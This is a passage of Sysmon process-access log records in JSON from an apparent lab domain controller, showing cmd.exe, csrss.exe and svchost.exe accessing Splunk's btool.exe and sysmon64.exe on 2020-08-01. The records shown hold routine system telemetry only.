AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF0-5F25-0000-001094420500}","ParentProcessId":"4204","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1FF0-5F25-0000-001094420500}\r\nSourceProcessId: 4204\r\nSourceThreadId: 4200\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001050430500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1FF0-5F25-0000-001094420500}","SourceProcessId":"4204","SourceThreadId":"4200","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001050430500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF0-5F25-0000-001050430500}\r\nTargetProcessId: 4224\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF0-5F25-0000-001050430500}","TargetProcessId":"4224","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3029,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:28.452","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3030,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:28.452\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 